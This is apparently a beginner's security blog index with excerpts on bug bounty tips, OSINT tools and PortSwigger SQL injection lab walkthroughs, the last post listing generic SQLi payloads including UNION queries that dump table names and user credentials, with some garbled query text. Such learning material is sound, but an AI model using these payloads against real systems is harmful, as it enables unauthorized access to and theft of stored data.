Posts

5 Tips for the Beginners Who Want to Start Bug Bounty

Image
  1. Start small and focus on learning Don’t jump into complex programs immediately. Start with smaller programs or platforms with clearly defined scopes and good documentation. This will allow you to learn the ropes, understand the bug bounty process, and build your confidence without getting overwhelmed. 2. Choose your targets wisely Not all programs are created equal. Some programs have very active communities and are more likely to reward beginners, while others are highly competitive and may require more advanced skills. Research different programs, read their rules and scope, and choose ones that are beginner-friendly and align with your interests and skill set. 3. Learn the basics of web application security Familiarize yourself with common web vulnerabilities like SQL injection, cross-site scripting (XSS), and insecure direct object references (IDOR). Resources like Web Security Academy, PortSwigger Web Security Academy, and OWASP Top 10 can help you understand these vulner...
Post a Comment
Read more

7 Best Tools for OSINT

OSINT stands for Open Source Intelligence. It means harvesting data that has been obtained from publicly available sources. OSINT Tools: The Harvester ( Link ) Maltego ( Link ) TweetDeck ( Link ) Google Dorks OSINT Framework ( Link ) TinyEye ( Link ) Google Image Search ( Link )
Post a Comment
Read more

Finally, I completed the course

Image
 
Post a Comment
Read more

SQL injection attack, listing the database contents on non-Oracle databases

Image
 Step 1: Go to the product category to ensure whether this is SQL injection vulnerable or not. If it shows ‘Internal Server error Or HTTP request 500 ‘ , it means this site is SQL injection vulnerable. Step2: To check the number of columns, we run the injection query: ‘ order by 1- - It responds to HTTP 200. That means the database has at least 1 column. ‘ order by 2- - It also responds to HTTP 200. That means the database has at least 2 columns. ‘ order by 3- - It responds to HTTP 500 & internal server errors. That means the database doesn’t contain 3 columns. It is noted that every time when we inject a vulnerable query on the category filter we have to encode the query by pressing Ctrl+U (URL encoding). Step3: To find out which database version it is, ‘UNION SELECT @@@version ,null - - It responds to 500HTTP bad requests, so we ensure that the site database doesn’t have Microsoft. version. Now you run the PostgreSQL query: Microsoft SELECT @@version Postgr...
Post a Comment
Read more

SQL injection attack, querying the database type and version on Oracle(Portswigger Lab 07)

Image
Path: Product Category filter Goal: display the database version string Step1: Determine the number of columns after the category name, we run a query Query: ‘ order by 1 - - then, select all and press Cntrl+U for URL encoding Response 200 OK It shows that the status HTTP/2 200 OK. It means the server responds to the malicious query. It also means that the server has 1 column. step 2: Then, we check the same query for the 2 columns. Query: ‘ order by 2 - -   then, select all and press Cntrl+U for URL encoding It shows that the status HTTP/2 200 OK. It means the server responds to the malicious query. It also means that the server has 2 columns. Step 3: Then, we check the same query for the 3 columns. Query: ‘ order by 3 - - select all and press Cntrl+U for URL encoding 'It shows that the status HTTP/2 500 Internal Server Error. It means the server doesn’t respond to the query. It also means that the server doesn’t have 3 columns. Step 4: Determine the datatype...
Post a Comment
Read more

SQL Based on Portswigger Lab 3

This type of UNION attack is done using the UNION keyword, which lets you execute an additional SELECT query and append the results to the original query. For example , if an application executes the following query containing the user input "Gifts": SELECT name, description FROM products WHERE category = 'Gifts' Then an attacker can submit the input: ' UNION SELECT username, password FROM users-- Blind SQL : This means that the application does not return the results of the SQL query or the details of any database errors within its responses. First-order SQL injection:   It arises when the application takes user input in an unsafe way. Second-Order SQL injection:  It arises when the application takes user input from an HTTP request and stores it for future use. Later when handling a different HTTP request, the application retrieves the stored data and incorporates it into a SQL query in an unsafe way. Second-order SQL injection often arises in situation...
Post a Comment
Read more

Some Basics of SQLi

Image
Some of the common SQLi commands which are important to perform SQL injection attack: General :                  ' or '1' = '1                ' or '1' = '1’                ' or '1' = '1 -- -                ' or '1' = '1 #                1 UNION SELECT 1,2,3 For UNION Attack : 0 UNION SELECT 1,2,database() 0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one' 0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users' 0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users In-Blind SQL :                ' OR 1=1;--                select * from users where username=''...
Post a Comment
Read more